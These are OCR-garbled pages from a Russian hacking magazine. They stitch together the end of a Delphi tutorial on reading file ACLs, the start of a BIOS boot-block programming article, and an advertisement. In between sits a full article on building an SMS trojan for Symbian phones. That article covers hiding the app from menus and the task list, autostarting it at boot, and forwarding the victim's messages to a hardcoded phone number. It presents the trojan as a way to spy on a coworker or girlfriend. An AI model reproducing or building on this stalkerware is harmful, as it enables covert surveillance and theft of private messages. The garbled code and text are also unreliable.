ЗісІЗіагі : ЭѴѴОВЭ; 
епсі; 

□ Просмотр списка 

Итак, в переменной асііпіо у нас есть инфор- 
мация о записях АСІ_. Теперь нужно просто 
просмотреть его и вывести информацию на 
экран. Для этого цикл должен выглядеть при- 
мерно следующим образом: 

Іогі:=01оасІІп!о.АсеСоипМ сіо 
Ьедіп 

і{поІ(ОеІАсе(рЭАСІ_ Л , і, Роіпіег(асе)))іЬеп 
сопііпие; 

// Разбор записи АСЕ 
епсі; 

Список АСЬ содержит только указатели на 
АСЕ-записи. Напоминаю, что АСІ_ — это спи- 
сок контроля доступа, а АСЕ — это отдельная 
запись этого списка. Чтобы получить запись 
из списка контроля доступа, нужно исполь- 
зовать функцию ОеІАсе. Ей передается три 
параметра: 

•указатель на АС І_; 

• индекс интересующей нас записи; 

• указатель на переменную, в которую будет 
записан результат. 

Если результат не нулевой, то процесс по- 
лучения записи прошел удачно. В примере 
выше в качестве третьего параметра пере- 
дается указатель переменной АСЕ. Ее нужно 
объявить следующим образом: 




асе : Л АССЕ35_АСЕ; 

То есть это указатель на структуру АССЕ53_ 
АСЕ, формат которой мы так тщательно вы- 
числяли благодаря файлу помощи и МЗЭЫ. 

О Разбор записи АСЕ 

Просматривая список, мы получили АСЕ-за- 
пись и по ней теперь должны определить, что 
разрешено, а что запрещено. Но одна запись 
может быть либо разрешающая, либо запре- 
щающая. Нет такой записи, которая описыва- 
ет и то, и другое сразу. Если нужно что-то за- 
претить, а что-то разрешить, то в списке АСІ_ 
создается две записи АСЕ. Одна запись что-то 
разрешает, а другая что-то запрещает. 

Чтобы определить, какая именно перед нами 
запись, необходимо проверить поле 
АсеТуре заголовка АСЕ-записи: 

сазе (асе Л . Неасіег. АсеТуре) о? 
АССЕЗЗ_А1_1_0\Л/ЕЭ_АСЕ_ТУРЕ: Это — разрешение; 
АССЕ55_0ЕІ\ІІЕЭ_АСЕ_ТѴРЕ: Это — запрещение; 
еізе Что-то другое; 
епсі; 

Константы АСС ЕЗЗ_А1_1_0\Л/ЕЭ_АС Е_ТУ Р Е и 
АССЕЗЗ_ЭЕІЧІЕЭ_АСЕ_ТѴРЕ опять же в заго- 
ловочных файлах ЭеІрЫ я не нашел, поэтому 
их придется описать в проекте самостоятель- 
но следующим образом: 

АССЕ53_АІ_І_0\Л/ЕЭ_АСЕ_ТѴРЕ = $00; 
АССЕЗЗ_ЭЕІ\ІІЕЭ_АСЕ_ТѴРЕ = $01 ; 

Теперь, если это разрешение или запреще- 
ние, то нужно узнать, что именно разреша- 
ется. Это можно понять из параметра ппазк. 
Полное описание маски можно найти в МЗЭКІ, 
а основные биты — первые три: 

• чтение; 

• запись; 

• выполнение. 



А на какого пользователя или группу влияют 
данные разрешения? Об этом можно узнать 
в поле ЗібЗіагі структуры АСЕ. Но это всего 
лишь указатель на идентификатор пользова- 
теля/группы. Реальное значение можно опре- 
делить следующей строкой кода: 

зісі := РЗЮ(@((асе) Л .ЗісІЗіаг1)); 

Теперь по идентификатору необходимо уз- 
нать имя пользователя и домен, в котором он 
зарегистрирован. Для этого используем фун- 
кцию І_оокирАссоипіЗісІ: 

Типсйоп І_оокирАссоип1:ЗісІ( 

ІрЗузіетЫате: РСЬаг; 

Зісі: Р5Ю; 

Мате: РСбаг; 
уагсЬЫате: ЭУѴОРЭ; 

ВеІегепсесЮотаіпМате: РСЬаг; 
ѵаг сЬРе^егепсесЮотаіпЫате: ЭѴѴОРЭ; 
ѵагреЭзе: 5Ю_МАМЕ_1)5Е 
):ВООІ_; зйсаіі; 

Быстренько пробежимся по параметрам этой 
функции: 

ІрЕу^етІЧате — указатель на строку для сис- 
темного имени. Мы будем определять пользо- 
вателя по ЗЮ, поэтому этот параметр должен 
быть нулевым; 

Зісі — идентификатор интересующего нас 
пользователя; 

ІЧате — указатель на строку, куда будет запи- 
сано имя пользователя; 
сЫЧате — размер строки для имени юзера; 

Ке^егепсесЮотаіпІЧате — строка для имени 
домена; 

сЬКе^егепсе^от^пМаппе — размер строки с 
именем домена; 

реііге — структура, определяющая тип записи. 

Пример использования функции 
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изег, сіотаіп : аггау [0. .200] сЬаг; 

Іеп: ОѴѴОВО; 

Ьедіп 

І_оокирАссоипіЗісІ(піІ, зісі, изег, Іеп, сіотаіп, Іеп, зісІ_пи); 



епсі; 



О В кучу! 

Теперь соберем все вышесказанное в кучу и 
напишем полноценный пример. Для этого на 
форме нам понадобится поле для ввода имени 
файла, кнопочка и список ЫзіѴіеѵѵ из четырех 
колонок: 

• имя пользователя; 

•домен; 

• доступ (тип АСЕ-записи); 

• действия (разрешаемые или запрещае- 
мые). 

По нажатию кнопки нужно написать код из 
листинга 1 . Для понимания этого кода даже 
комментарии не нужны, потому что все функ- 
ции и действия мы уже подробно рассмот- 
рели. Не забудь добавить в проект описания 
структур и переменных, которые мы рассмат- 
ривали в этой статье. 

О Заключение 

Для компиляции примера желательно под- 
ключить заголовочные файлы АсІАрі, АссСігІ 
и ѴѴіпбоѵѵз, где описаны все необходимые для 
работы с АСІ_ функции, структуры и прочая 
фигня. Хочу сделать одно замечание: в данной 
статье я просто рассматривал функции и при- 
меры их вызова, без проверок на ошибки. В 
примере, который ты найдешь на компакт-дис- 
ке, проверь все на ошибки, так как они вполне 
могут быть. Если юзер выберет файл, находя- 
щийся на РАТ32, то произойдет ошибка, ведь 
эта ФС не поддерживает списки доступа. 
Удачного кодинга! В ближайшее время мы 
продолжим тему прав доступа, потому что тут 
еще много интересного. И-И 
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ЛИСТИНГ 1 

асІЫзІѴіеѵѵ.ІІетз.СІеаг; 
іі (ѲеіЫатесІЗесигіІуІпЬ( 

РСЬаг(ЕсІіП.ТехЩ 
ЗЕ_РІІ_Е_ОЕиЕСТ, 
□АСЬ_ЗЕСШІТУ^РОЯМАТІОІ\І, 
піі, піі, РАСЦ@рОАСІ_), піі, 
рЗО)«>ЕЯЯОЯ_ЗІЮСЕ55) №іеп 
Ьедіп 

ЗЬоѵѵМеззаде('Ошибка'); 

ехіі; 

епсі; 

іДрОАСЬ=піІ)ІЬеп 

Ьедіп 

ЗЬоѵѵМеззаде('Список доступа пуст 1 ); 
ехіі; 
епсі; 

ІІ (поі (ЗеІАсІІпІогтаІіоп( 

рОАСІ_ Л , @асІІпІо, зІ 2 еОІ(асІІпІо), 
АсІЗігеІпІогтаІіоп)) ІЬеп 
Ьедіп 

ЗЬо\л/Меззаде('Не получилось определить 
информацию об АСЬ 1 ); 
ехіі; 
епсі; 

Іогі:=01оасІІпІо.АсеСоипІ-1 сіо 
Ьедіп 

ІІпоІ(ОеІАсе(рОАСІ_ Л , і, РоіпІег(асе)))ІЬеп 
сопііпие; 

пеѵѵАсЫасІЫзІѴІеѵѵ.ІІетз.АсІсІ; 
зісі := РЗЮ(@((асе)л ЗісІЗіаП)); 

Іеп := 200; 

ІІ (І_оокирАссоипіЗісІ(піІ, зісі, изег, Іеп, 



ь 




} I 



* , 



сіотаіп, Іеп, зісІ_пи))ІЬеп 
Ьедіп 

пе\л/АсІ.СарІіоп:=изег; 

пеѵѵАсІ.ЗиЬІІетз.АсІсІ(сІотаіп) 

епсі 

еізе 

Ьедіп 

пеѵѵАсІ.СарІіоп:='Лажа'; 

пеѵѵАсІ.ЗиЫіетз.АсІсІСЛажа') 

епсі; 

сазе (асе л .НеасІег.АсеТуре) оі 
АССЕ53_АІ_І_ОѴѴЕО_АСЕ_ТУРЕ: 
пеѵѵАсІ.ЗиЫіетз.АсІсІСРазрешено 1 ); 
АССЕЗЗ_ОЕІ\ІІЕО_АСЕ_ТУРЕ: 

пеѵѵАсІ.ЗиЫіетз.АсІсІСЗапрещено 1 ); 
еізе пеѵѵАсІ.ЗиЫіетз.АсІсІСДругое 1 ); 
епсі; 

асІіопз:="; 

ІІ (асе л .НеасІег.АсеТуре = 
АССЕ53_АІ_І_ОѴѴЕО_АСЕ_ТУРЕ) 
ог (асе л .НеасІег.АсеТуре= 
АССЕ53_ОЕІ\ІІЕО_АСЕ_ТУРЕ) ІЬеп 
Ьедіп 

ІІ(асе л .МазкапсІ $1)=1 ІЬеп 
асІіопз:=асІіопз+' Чтение 1 ; 
ІІ(асе л .МазкапсІ $2)=21Ьеп 
асІіопз:=асІіопз+' Запись 1 ; 

ІІ (асе л . Мазк апсі $4)=4 ІЬеп 
асІіопз:=асІіопз+' Выполнение 1 ; 

епсі; 

пеѵѵАсІ.ЗиЬІІетз.АсІсІ(асІіопз); 

епсі; 
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ЕСТЬ ТАКИЕ НЕХОРОШИЕ ЛЮДИ, КОТОРЫЕ ВЕЗДЕ СУЮТ СВОЙ НОС. НАПРИМЕР, ОНИ ЧАСТО ИНТЕРЕСУЮТСЯ, С КЕМ 



ПЕРЕПИСЫВАЕТСЯ ЗМЗ-КАМИ ИХ КОЛЛЕГА ПО РАБОТЕ ИЛИ ЛЮБИМАЯ ДЕВУШКА. ЧТО ДЕЛАЮТ ТАКИЕ ПЛОХИЕ ЛЮДИ? 



ОНИ ДАРЯТ ОБЪЕКТУ СВОЕГО ИНТЕРЕСА СМАРТФОН НА БАЗЕ ЗУМВІАЫ С ПРЕДУСМОТРИТЕЛЬНО УСТАНОВЛЕННЫМ 



СМС-ТРОЯНОМ :). 



▼ ПИШЕМ СМС - ТРОЯН 
ДЛЯ СМАРТФОНОВ НА БАЗЕ 
8УМВІАН 




адача, в сущности, тривиальна, 
если не учитывать, что мы ориен- 
тируемся на смартфоны. Необхо- 
димо написать приложение, которое неви- 
димо в системе, автоматически стартует 
при включении телефона и отсылает все 
входящие/исходящие смс при их поступ- 
лении/отправке или просто сливает все 
смс из определенной папки на номер ха- 
кера. 

□ §ОК и средства разработки 

Так сложилось, что на данный момент 
существует множество платформ смарт- 
фонов на ЗутЫап. Две основные — это 
ЗегіезбО и 1)10, каждая из которых подраз- 
деляется на разные версии. Мы с тобой 
будем ориентироваться на смартфоны 
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ЗегіезбО как на самые распространенные. 
Я использовал ЗЛК для версии ОС 6.1 . 

Тут хотелось бы прояснить такой момент: в 
АРІ ЗутЫап существует совместимость сни- 
зу вверх, то есть приложение, написанное 
для более ранних систем в большинстве слу- 
чаев будет работать на более поздних (кроме 
ЗутЫап ѵ9). Поэтому я выбрал самую млад- 
шую версию ОС, чтобы охватить наибольшее 
количество поддерживаемых моделей. Что 
касается установки ЗЪК, то этот процесс 
описан не один раз, поэтому на этот раз мы 
обойдемся без подробностей (в Кодинге 
мы уже писали на эту тему: Ы1р://хакер.ги// 
тааа2Іпе/ха/068/102/1 .азр ). Для разработки 
ты можешь использовать одну из широко рас- 
пространенных ЮЕ: СобеѴѴаггіог, ВогІапсІ С++ 
ВиіІсІегХ МОЬіІе Есііііоп, Есіірзе и ѴЗ. Лично я 



советую использовать связку ѴізиаІ Зіисііо. 
ЫЕТ + СагЬісІе.ѴЗ. СагЫбе — это надстройка 
над студией, позволяющая создавать про- 
екты ЗутЫап 03 Ргоіесі в удобной среде от 
МісгозоіГ Кроме того, использование этого 
инструментария поможет избавиться от раз- 
ного рода проблем, описанию которых можно 
было бы посвятить целую книгу. 

С момента установки и настройки, необходи- 
мого для разработки ПО, будь готов ктому, что 
твоими верными друзьями станут ЗЪК Неір и 
форумы разработчиков (сайты с полезной 
информацией приведены во врезке). Само 
собой, вся информация — на английском, по- 
этому, если ты его не знаешь в необходимом 
для чтения документации объеме, совсем не 
факт, что у тебя получится собрать даже ба- 
нальный НеІІоѴѴогІсІ. 
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О Особенности кодинга под 
ЗутЫап 

Кодить мы будем на бескомпромиссном 
и жестком С++. Создай в Ѵ8 проект Ыеѵѵ 
ЗутЫап Рго]ес{, а в качестве шаблона вы- 
бери 560 ЕІКОЫ СопігоІ ВазесІ Арріісаііоп 
(НеІІоѴѴогІсІ). Будет сгенерирован базовый 
проект, который необходимо досконально 
изучить для понимания важнейших принци- 
пов кодинга под ЗутЫап. Пусть тебя не пу- 
гают зверские названия классов, методов и 
переменных: в ЗутЫап С++ принято отка- 
зываться от венгерской конвенции, поэтому 
настоятельно рекомендую изучить документ 
ІМатіпд сопѵеЫіопз. Также в ЗутЫап не под- 
держиваются стандартные исключения С++, 
а введена своя методика, направленная на 
предотвращение утечек памяти. С этой же 
целью используются двухфазные конструк- 
торы. Объекты принято создавать так: 




Обрати внимание, что оператор пеѵѵ пе- 
регружен и используется с параметром 
ЕІ_еаѵе: этот механизм позволяет аварийно 
завершить программу и высвободить сис- 
темные ресурсы в случае, если оператору 
пеѵѵ не удалось адресовать необходимую 
память. После создания объекта указатель 
помещается на связанный с каждым по- 
током выполнения СІеапирЗІаск. Каркас 
приложения (арріісаііоп Ігатеѵѵогк) состоит 
из четырех основных классов: Арріісаііоп, 
Ооситепі, АррШ и Сопіаіпег. Все они насле- 



дуются от системных классов и служат для 
создания документа приложения, создания 
III, обработки событий, перерисовки 
приложения и других задач. Советую тебе 
изучить раздел Арріісаііоп Ргатеѵѵогк в до- 
кументации. 

После компиляции и сборки проекта прило- 
жение можно протестировать в эмуляторе. 
Думаю, как собрать инсталляционный файл 
для мобилы, ты разберешься :). 

Теперь будем постепенно добиваться пос- 
тавленной цели и сделаем наше приложе- 
ние невидимым. 

О Делаем невидимку 

Само собой, вряд ли наша система скрыто- 
го наблюдения будет представлять какую- 
то ценность, если после установки в теле- 
фон, жертва увидит его в меню или в Тазк 
Мепедег. Поэтому сейчас мы немного при- 
прячем нашу программу :). Как ты, скорее 
всего, уже знаешь, при сборке проекта со- 
здается аіі-файл (арріісаііоп іЫогтаііоп ТМе), 
который содержит информацию о нашей 
сборке. Для того чтобы придать программе 
необходимые свойства, нужно модифици- 
ровать структуру АІР_ОАТА, находящуюся 
в файле ОигМедаАрраіЕгзз, изменив в ней 
необходимые поля. Нас интересует поле 
Нісісіеп, которому нужно задать значение 
КАррІзНісІсІеп. Выглядит это примерно так: 





Нісісіеп = КАррІзНісІсІеп;І 



После этого необходимо переопределить 
виртуальную функцию ІІрсІаіеТазкМаппеІ-, 
которая отвечает за отображение прило- 
жения в таск-листе. Для этого добавляем в 
заголовочный файл документа строку в объ- 
явление класса Ооситепі: 



ѵіДиаЩоі^^рЦа1^ЩзкЫатеЦ| 

САраѴѴІпЦоѵѵОгоирІ\Іате* аѴѴдІ\Іате);| 



После чего в реализацию класса документа 
добавляем: 



|ѵоісІ СХаЗМЗОоситепі::ІІрсІа1:еТазкІ\ІаітіеЦ| 
^/вызываеш^Щ^ 

САкпОоситепі::ІІрсІа1:еТазкІ\ІагпеЦа\/ѴдМаітіе);| 
^/прячё^риложёни^^о^іі^^іи^га| 
аѴѴдМате->ЗеШісІсІеп(ЕТгие); 
аѴѴдІ\Іате->ЗеіЗузІет(ЕТгие); I 



После этого в конструктор класса АррІП 
вписываем следующие строки: 



к/оісі СХаЗМЗАррІІІ::Сопз1:гис1:Ц)І 



^оо!ѴѴІп(^паЬІеНесеір^ 

//приложение никогда не может получить фокусі 
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СЕікопЕпѵ::ЗіаІіс()->РооІѴѴіп().5еЮгсІіпаІРо5і1:іоп(| 
-1000, ЕСоѳѴѴІпРгіогі1уМѳѵѳгАіЕгопі)*Д 



Это необходимо для того, чтобы наше при- 
ложение никогда не могло получить фокус, 
даже если жертва найдет в файловой сис- 
теме исполняемый файл и запустит его. 

О Делаем автозапуск 

После того как мы скрыли наше приложе- 
ние от любопытных пользовательских глаз, 
необходимо заставить его автоматически 
запускаться при старте телефона. 

Для этого обычно используется так назы- 
ваемые гесодпі^егз, которые предназна- 
чены для идентификации МІМЕ-типов. Это 
нужно, например, чтобы сопоставить оп- 
ределенные типы документов с програм- 
мой-обработчиком. Но рекогнайзеры также 
используются и при автостарте программ. 
В журнале, к сожалению, не хватит места, 
чтобы полностью рассказать теорию реког- 
найзеров, поэтому я оставлю на диске доку 
для дальнейшего изучения материала, а 
сам предложу использовать более простой 
путь — разработку парней из Ыеѵѵі-С.сот . 
Ребята собрали зіз-файл, который, будучи 
интегрирован в наш инсталлятор, запускает 
приложение при загрузке телефона :). 
Называется эта прога ЕгВооі, а найти ее ты мо- 
жешь или на ЫеѵѵІ-С.сот . или на нашем диске. 
Для работы нужно свершить следующее: 

1 . В папке «/зіз/» нашего проекта (или в лю- 
бой другой папке, где находится оигАрр. 
ркд) создается файл оигАрр. Ьооі с единс- 
твенной строкой: 



|Ьооі:\8убІет\аррб\оигАрр\оигАрр.арр| 



Эта строка указывает адрес нашего прило- 
жения в смартфоне. 

2. В файл оигАрр. ркд добавляем следующие 
строки: 



// команда на копирование файла оигАрр. Ьооі вД 
//смартфон @«Ѳ2Ьоо1.5І5»,(0х101ЕР000)Д 
«оигАрр. Ьооі» - «!:\зу5іет\ргадгатз\е2Ьоо1:\ЬооІ\| 

оигАрр. Ьооі>Д 

// подключение инсталлятора егЬооГкнашем^ 



Все! При установке нашей программы на 
смартфон будут установлены как наше при- 
ложение, так и загрузчик. 

О Ваяем функционал трояна 

В архитектуре приложений 8утЫап базо- 
вой единицей является епігу. К примеру, зтз 
всегда состоит из одной этой самой епігу, а 
ММ8 — из нескольких. К нашей радости, в 
8утЬіап существуют готовые классы, поз- 
воляющие взаимодействовать с сервером 
сообщений. Вот основные из них: 

СМзѵЕпігу — позволяет создавать, переме- 
щать, удалять и получать информацию из 
епігу; 

ТМзѵЕпігу — служит для получения и изме- 
нения информации об епігу. 

Сервер сообщений может обрабатывать 
асинхронные запросы от клиентов, которые 
взаимодействуют с сервером с использо- 
ванием так называемых объектов сессии, 
которые являются экземплярами класса 
СМзѵ8еззіоп. Как создать сессию и полу- 
чить доступ к папке входящих сообщений, 
ты можешь увидеть в коде во врезке «Под- 
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ключаемся к серверу сообщений и творим 
зло в папке входящих смс». После получе- 
ния доступа к входящим смс, мы каждое со- 
общение отправим на номер хакера :). Как 
это реализовано, ты можешь посмотреть в 
исходниках. А как создать смс, ты можешь 
посмотреть на врезке «Создаем зтз». Реко- 
мендую изучить этот исходник, особое вни- 
мание уделив подключаемым библиотекам. 



Подключаемся к серверу сообщений и тво 
рим зло в папке входящихсмс^Д 

СМуЗеззіопОЬзѳгѵег* оЬзегѵег = пеѵѵ (ЕЬѳаѵеУД 

СМуЗеззіопОЬзегѵепД 

// необходимый для создания сессии объѳктТД 
//унаследованный от ММзѵЗѳззіопОЬзѳілюгД 
СІеапирЗіаскхРизЩоЬзегѵеіфД 

СМзѵЗеззіоп* зеззіоп=Д 

СМзѵЗеззіоп::ОрепЗупсіГ(*оЬзейющД 
// создаем объект сессии^Д 
СІеапир5іаск::РизЩзеззіоп)~Д 

//объект, определяющий порядок сортировкизтз^Д 
ТМзѵЗеІесІіопОгбегіпд огбёцД 

КМзѵМоОгоиріпдТД 

^^М^ЩоРВуРаІе^ 

ЕТгие): ^ 

СМзѵЕпігу* іпЬохЕпігу = СМзуЕп1гу::ЫеууЦД 

~*зеззюп7И 

КМзѵСІоЬаІІпВохІпбехЕгтігуІфД 

(эгбеіфИ 

// выбираем входящие сообщения^Д 
СІеапирЗіаскхРизЩіпЬохЕгтЩфД 
СМзѵЕпІгуЗеІесІіоп* зеіесііоп = | 
іпЬохЕп1гу->СЬІІбгеп\А/і11іТуреЕ(^[ 
КЦІбМзѵМеззадеЕп1гу)Д 
//создаем список сообщенийвІпЬох^И 



ХАКЕР 09 /93/ 06 





ІСІеапир5іаск::РорАпсЮезігоу(4); //освобождаем память 



А теперь смотри, как легко будет создать сообще- 
ние: 



'/создаем строку с номером хакера| 
_І_ІТ1 6(КОаіа,"+791 621 98255");| 



■//преобразовываем ее к типу ТОезС &І 



уоісі СХа5епсІ5тз::5М5Рипс(ТРезС &аНесіріеп1АсІсІге5з)| 



СЗепсІАзОЬзегѵег *апОЬзегѵег = пеѵѵ СЗепсІАзОЬзегѵег():\\І 



І//создаемзтз| 



//создаем класс, отвечающий за отправку зтз^| 
СЗепЬАз* аЗепЬАз = СЗепсІАз::МеѵѵІ_(*апОЬзегѵефИ 

СІеапирЗіаск::РизІіЦа8епсІАз);Н 


О Вместо заключения 

В этой статье мы рассмотрели, каксоздать простенький 
смс-троян для смартфона. Функционал можно расши- 


аЗепбА8->АббМітСараЬІІііуцН 

КУІсІМзѵМ1тОиегуЕсІІ1огиісІЩРаізе)ІД 


рить по своему усмотрению, ведь фантазия и програм- 
мерские возможности нам это позволяют. Например, 
легко добавить возможность управления чужой моби- 


//устанавливаем тип сообщения^зтз^І 
а8епЬАз->ЗеМітЦКІІісІМздТуреЗМЗ);^| 
//создаем сообщениеД 


лой за счет посылки специальных команд с определен- 
ного номера и творить на ней все что угодно :). Дело за 
малым — внедрить прогу в аппарат жертвы. Ш 
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На диске ты найдешь 

ИСХОДНИК ПРОГРАММЫ, 
ПОЗНАВАТЕЛЬНЫЕ ДОКИ, А 
ТАКЖЕ НЕОБХОДИМОЕ ПО 






> Информация в статье 
представлена исклю- 
чительно в образова- 
тельных целях! Мы не 
несем ответственности 
за противозаконное 
использование этой 
информации. 






> Наша программка 
будет работать на боль- 
шей части смартфонов 
под ЗутЬіап :). 



(ШД) 

© 



> ГіДр://сІиЬ60.огд 
— пожалуй, единствен- 
ный стоящий источник 
информации о ЗутЬіап 
на русском языке. 
ЫеууЬС.сот — весьма 
познавательный ресурс. 
ГіДр://сІізсиззіоп.Ьгит . 
покіа.сот — здесь 
можно найти решение 
практически любой 
проблемы. 
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ОГРОМНОЕ ЭСТЕТИЧЕСКОЕ УДОВЛЕТВОРЕНИЕ И НАСЛАЖДЕНИЕ. СЕГОДНЯ МЫ СПУСТИМСЯ НА САМЫЙ НИЗКИИ УРО- 



ВЕНЬ, КОТОРЫЙ ТОЛЬКО ВОЗМОЖНО ДОСТИГНУТЬ НА ІВМ РС! держись, мы будем программировать не только 



БЕЗ ОПЕРАЦИОННОЙ СИСТЕМЫ, НО ДАЖЕ БЕЗ ВІОЗ'А! 




I а прикладном уровне обитать не- 
интересно. Здесь все приходится 

I I делать через готовые интерфейсы 

(типа \л/іп32 АРІ), громоздящиеся своими ие- 
рархическими слоями друг на друга. С этой 
точки зрения программирование подх86 мало 
чем отличается от той же Альфы. Мы упира- 
емся в операционную систему, становясь ее 
пленниками, заключенными в тесную клетку. 
Без оси жизнь становится более захватыва- 
ющей и интересной. Можно напрямую обра- 
щаться ко всем портам ввода-вывода (и 
знать, что это реальные порты, а не какие-то 
там виртуальные), выполнять все привилеги- 
рованные инструкции, переходить в защищен- 
ный режим и возвращаться обратно. В общем, 
делать все, что заблагорассудится. Вот толь- 
ко... основное компьютерное оборудование 
(в первую очередь, чипсет) на этом уровне нам 
неподвластно. Точнее, подвластно, но не сов- 
сем. Конфигурирование и настройка чипсета 
осуществляется настадии начальной инициа- 
лизации компьютера во время загрузки ВЮЗ, 
подготавливающей его к работе. Некоторые 
параметры могут быть изменены позднее как 



через порты ввода/вывода, так и через саму 
ВЮЗ, но основной фундамент остается не- 
поколебимым. А жаль... ведь далеко не вся- 
кая версия ВЮЗ использует возможности 
аппаратуры на 100%, к тому же лишает нас 
радости живого общения с железом, подавая 
его на стол готовеньким. А если нам хочется 
отведать мяса с кровью?! Тогда необходимо 
перепрограммировать ВЮЗ, аточнее неболь- 
шую его часть, называемую Ьооі-блоком и на- 
иболее приближенную к аппаратуре. 
Перепрограммирование Ьооі-блока открывает 
огромные возможности для трюкачества, поз- 
воляя раскрыть свой творческий потенциал и 
показать, на что ты способен. Да что там го- 
ворить! Это по-настоящему сложно, а значит, 
реально круто! 

О Исходные реагенты, или что нам 
понадобится 

Прежде всего нам понадобится материнс- 
кая плата, которую не жалко потерять (в том 
смысле, что ее смерть не станет трагедией). 
Еще нужен программатор (поскольку не все 
матери дают прошивать Ьооі-блок, а за пре- 



делами ЬооГблока жизнь уже становится не 
такой интересной), который легко купить на 
радиорынке; любая программа для редакти- 
рования ВЮЗ'а(обычно идущая надиске, при- 
лагаемом к материнской плате или лежащая 
на сайте производителя); прошивка ВЮЗ'а 
для изучения и подражания (скопированная 
из самого ВЮЗ'а или скачанная с сайта); 
транслятор ассемблера, умеющий генери- 
ровать двоичные файлы (РАЗМ, ІМАЗМ) и, 
наконец, документация на чипсет (ІпіеІ и АІѴЮ 
раздают ее бесплатно, а остальные произво- 
дители — только своим партнерам, зачастую 
под подписку о неразглашении, как будто там 
есть что разглашать). 

О Ликбез, или как все это работает 

После «холодной» перезагрузки или включе- 
ния питания процессор, находящийся в ре- 
альном режиме, передает управление по ад- 
ресу РОООЬі : РРРОЕі , где находится точка входа 
в ВЮЗ. В древних ІВМ АТ микросхема посто- 
янной памяти физически «висела» на процес- 
сорной шине, непосредственно отображаясь 
на 64-Кбайтный регион памяти, от Р000:0000 
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до Р000:РРРР. Современные прошивки в этот 
объем уже не вмещаются и занимают поряд- 
ка 512 Кб (да и то в упакованном виде), что 
составляет половину адресного пространс- 
тва реального режима. Поэтому в памяти 
непосредственно отображаются лишь 64 Кб 
прошивки (порядка 4 Кб из которых состав- 
ляет Ьооі-блок), а остальные части прошивка 
должнауметь считывать из микросхемы РІазб- 
ВІОЗ'а самостоятельно, обращаясь к специ- 
альномуконтроллеру, какправило, «вживлен- 
ному» в южный мост чипсета и соединенному 
с ВЮЗ'ом по І_РС- или І5А-шине. 

В тот момент, когда ВЮЗ получает управ- 
ление, практически все имеющееся обору- 
дование к работе еще не готово. РІет даже 
оперативной памяти, поскольку ОВАМ-конт- 
роллер не настроен и не инициализирован. 
Короче, как дальше жить?! Поэтому первым 
делом Ьооі-блок проводит первичную ини- 
циализацию важнейших узлов, после чего 
считывает основной код ВІОЗ'а и распако- 
вывает его в оперативную память. Ріа этом 



работа ЬооРблока заканчивается, и всю 
дальнейшую инициализацию системы вы- 
полняет распакованный им код. 

Кроме инициализации, ВЮЗ также управ- 
ляет оборудованием (например, выключает 
жесткие диски по прошествии определен- 
ного времени, следит за показанием датчи- 
ков напряжения и температуры, регулируя 
частоту процессора и оперативной памяти), 
а также предоставляет в распоряжение про- 
граммиста обширную библиотеку функций, 
абстрагирующую его от конкретного железа 
и доступную через векторы прерываний. В 
частности, за дисковую подсистему отвечает 
прерывание 136, но вернемся к нашим бара- 
нам, то есть к голому железу. 

Обычно Ьооі-блок располагается в последних 
4 Кб файла прошивки, а по смещению 106 от 
его конца находится точка входа в ВЮЗ, пред- 
ставляющая собой )тр на подлинную точку 
входа: 

0007РРР0: ЕА5ВЕ000Р0 ]тр 0Р000ЮЕ05В 



Остальной код прошивки, как правило, упа- 
кован, поэтому непосредственно внедряться 
можно только в последние 4 Кб, то есть в про- 
межуток между Р000:ЕРРР и Р000:РРРР. 
Внедряемый код должен быть либо полно- 
стью перемещаемым (то есть сохранять свою 
работоспособность независимо от базового 
адреса загрузки), либо в начало ассемблер- 
ного листинга необходимо воткнуть директи- 
ву «ОВО 0ХХХХ6», где 0ХХХХ6 равно разнице 
конца Ьооі-блока (лежащего по смещению 
РРРР6) и размеру внедряемого кода. 
Последние два байта Ьооі-блока занима- 
ет контрольная сумма, рассчитываемая по 
следующему алгоритму (сохранившемуся 
еще со времен первых ВЮЗ'ов): мы просто 
складываем все байты друг с другом и нахо- 
дим остаток от деления на 1006, что в псев- 
докоде занимается так: зит = (зит + пехі_ 
Ьуіе) & ОхРР. Контрольная сумма всего 
ЬооРблока должна равняться нулю, следова- 
тельно, последний байт блока равен (1006 - 
зит) & ОхРР. 




ДОСТУП 

по ВЫДЕЛЕННОМУ 



ИННРНЕ 



виртуозное 

исполнение 



10 



МОСКВЕ 

МОСКОВСКОЙ * 6 л 



Мбит 
в сек 



П Е ЦИАЛЬНОЕ ПРЕДЛОЖЕНЩ ■ 
СКИДКА' ИА ПОДКЛЮЧЕНИЕ 



Е-таіі. 



Подключение - от 40 у.е. 

Минимальная месячная плата - 5 у.е. 

Срок подключения - 14 дней [для Москвы) 

Специальные скидки для абонентов в жилых домах 

Организация еиртуальных частных сетей (ѴРМ) 

Круглосуточная техническая поддержка 

Аренда оборудовании для абонентов - бесплатно 

Виртуальный и физический хостинг 

Шьсерверов - трафик не ограничен 

Электронная почта для абонентов - бесплатно 

■действуют ограничена 





Міггог о! Ьііз пеесіесі Ьу 
дгарНісз сігіѵег дгарЫсз 
ІМегтаІ сопігоіз 



Оеѵісе 1 Сопіідигайоп 
Ведізіегз: РСІ ЕхргеззХІб 



РСІ Ехргѳзз х 1 6 Сопігоіз 
Апаіод Сопігоіз 
Еггог ПероПіпд Сопігоіз 
ѴС Сопігоіз 
НоІРІид/ЗІоЮопІгоІз 



Оеѵісе ЕеѵѳІ Сопігоіз 



Оеѵісе 0 СопІідигаНоп 
Ведізіегз 




ОМІ Яооі Сотріех Ведізіег 
ВІоск(ВСВВ) 



(О) МСН-ІСН6 ЗѳгіаІ ІпІеДасе 
(йМІ) Сопігоіз: 

Апаіод Сопігоіз Еггог 
РѳроПіпд Сопігоіз ѴС Сопігоі 
(ІпсІ.ѴСр) 



РСІ Ехргезз Асісігезз Вапде 



АссѳзѳсІ опіу Ьу РСІ 
Ехргѳзз ѳпЬапсесІ ассѳзз 
тесЬапізт. 4КВ Ыоск 
аііосаіесі Іог ѳасЬ роіепііаі 
сіѳѵісѳ іп гооі Ьіѳгагсііу 



Оеѵісе ЦеуеІ Сопігоіз РАМ 
_ _ ервав _ 1 

ОМІВАВ 

РСІЕХВАВ_ _ 
МСНВАВ 



> Регистры аппаратных устройств, отоб- 
ражаемые на адресное пространство и 
порты ввода/вывода 

О Работа с шиной РСІ 

Шина РСІ является основной шиной, через ко- 
торую к процессору подключаются все осталь- 
ные контроллеры и устройства, поэтому, что- 
бы научиться программировать голое железо, 
нам необходимо разобраться, как программи- 
ровать саму шину РСІ. Это легко. Достаточно 
выучить всего пару регистров: СР8Н и СРСІт. 

В порт СР8Н заносится адрес регистра, с ко- 
торым мы хотим работать (называемый также 
смещением или оіізеі'ом), а через порт СРСІт 
